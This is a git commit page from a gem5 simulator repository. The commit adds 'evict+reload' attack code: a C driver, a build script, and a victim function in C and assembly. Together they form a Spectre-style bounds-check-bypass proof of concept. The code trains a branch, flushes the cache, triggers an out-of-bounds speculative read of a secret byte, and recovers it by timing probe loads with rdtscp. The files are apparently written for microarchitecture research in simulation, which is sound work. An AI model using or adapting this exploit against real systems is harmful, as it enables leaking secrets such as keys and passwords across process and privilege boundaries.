diff options
| author | Iru Cai <mytbk920423@gmail.com> | 2019-04-10 16:00:23 +0800 |
|---|---|---|
| committer | Iru Cai <mytbk920423@gmail.com> | 2019-04-10 16:01:44 +0800 |
| commit | 612ad09b9825a032742ae2a2de20628bac97154b (patch) | |
| tree | e4ebce3e6c9c8160e1dd3874547c9b1fec835679 | |
| parent | 368bf919c17cab706fdf19294c07600c3f436f8f (diff) | |
| download | gem5-612ad09b9825a032742ae2a2de20628bac97154b.tar.xz | |
add evice+reload attack code
| -rw-r--r-- | attack_code/evict_load/attack.c | 50 | ||||
| -rwxr-xr-x | attack_code/evict_load/build.sh | 4 | ||||
| -rw-r--r-- | attack_code/evict_load/victim.asm | 22 | ||||
| -rw-r--r-- | attack_code/evict_load/victim.c | 16 |
4 files changed, 92 insertions, 0 deletions
diff --git a/attack_code/evict_load/attack.c b/attack_code/evict_load/attack.c new file mode 100644 index 000000000..85a2017f0 --- /dev/null +++ b/attack_code/evict_load/attack.c @@ -0,0 +1,50 @@ +#include <stdio.h> +#include <stdint.h> +#include <string.h> +#include <x86intrin.h> + +/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */ +#define LLC_SIZE (2 << 20) + +uint8_t dummy[LLC_SIZE]; +size_t array_size = 4; +uint8_t array1[200] = {1, 2, 3, 4}; +uint8_t array2[256 * 64 * 2]; +uint8_t X; +uint8_t array3[4096]; +uint8_t tmp; + +uint8_t victim(size_t idx); + +int main() +{ + unsigned long t[256]; + volatile uint8_t x; + + victim(0); + victim(0); + victim(0); + victim(0); + victim(0); + + memset(dummy, 1, sizeof(dummy)); // flush L2 + X = 123; // set the secret value, and also bring it to cache + + _mm_mfence(); + + size_t attack_idx = &X - array1; + victim(attack_idx); + + for (int i = 0; i < 256; i++) { + unsigned int junk; + unsigned long time1 = __rdtscp(&junk); + x ^= array2[i * 64]; + unsigned long time2 = __rdtscp(&junk); + t[i] = time2 - time1; + } + + printf("attack_idx = %ld\n", attack_idx); + for (int i = 0; i < 256; i++) { + printf("%d: %d, %s\n", i, t[i], (t[i] < 40)? "\x1b[1;31mhit\x1b[m": "miss"); + } +} diff --git a/attack_code/evict_load/build.sh b/attack_code/evict_load/build.sh new file mode 100755 index 000000000..6235809c6 --- /dev/null +++ b/attack_code/evict_load/build.sh @@ -0,0 +1,4 @@ +#!/bin/sh + +nasm -f elf64 victim.asm +gcc -O2 -o ../../attack attack.c victim.o diff --git a/attack_code/evict_load/victim.asm b/attack_code/evict_load/victim.asm new file mode 100644 index 000000000..bd3effbc3 --- /dev/null +++ b/attack_code/evict_load/victim.asm @@ -0,0 +1,22 @@ +; code similar to gcc -O2 -c victim.c, working on gem5 +; it doesn't store rdi to stack as -O0 + +extern array1 +extern array2 +extern array_size + +global victim + +victim: +xor eax, eax +cmp [rel array_size], rdi +jbe fret +lea rax, [rel array1] +add rax, rdi +movzx eax, byte [rax] +shl eax, 6 +cdq +lea rdx, [rel array2] +mov eax, [rdx + rax] +fret: +rep ret diff --git a/attack_code/evict_load/victim.c b/attack_code/evict_load/victim.c new file mode 100644 index 000000000..e9d3249bf --- /dev/null +++ b/attack_code/evict_load/victim.c @@ -0,0 +1,16 @@ +#include <stdlib.h> +#include <stdint.h> +#include <x86intrin.h> + +extern uint8_t array1[]; +extern uint8_t array2[]; +extern size_t array_size; + +uint8_t victim(size_t idx) +{ + if (idx < array_size) { + return array2[array1[idx] * 64]; + } + return 0; +} + |